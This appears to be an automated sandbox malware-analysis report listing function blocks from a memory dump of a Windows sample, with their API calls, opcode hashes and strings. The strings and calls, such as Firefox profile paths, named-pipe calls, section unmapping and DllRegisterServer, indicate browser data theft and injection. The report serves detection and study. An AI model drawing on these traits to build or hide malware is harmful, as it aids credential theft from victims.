  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
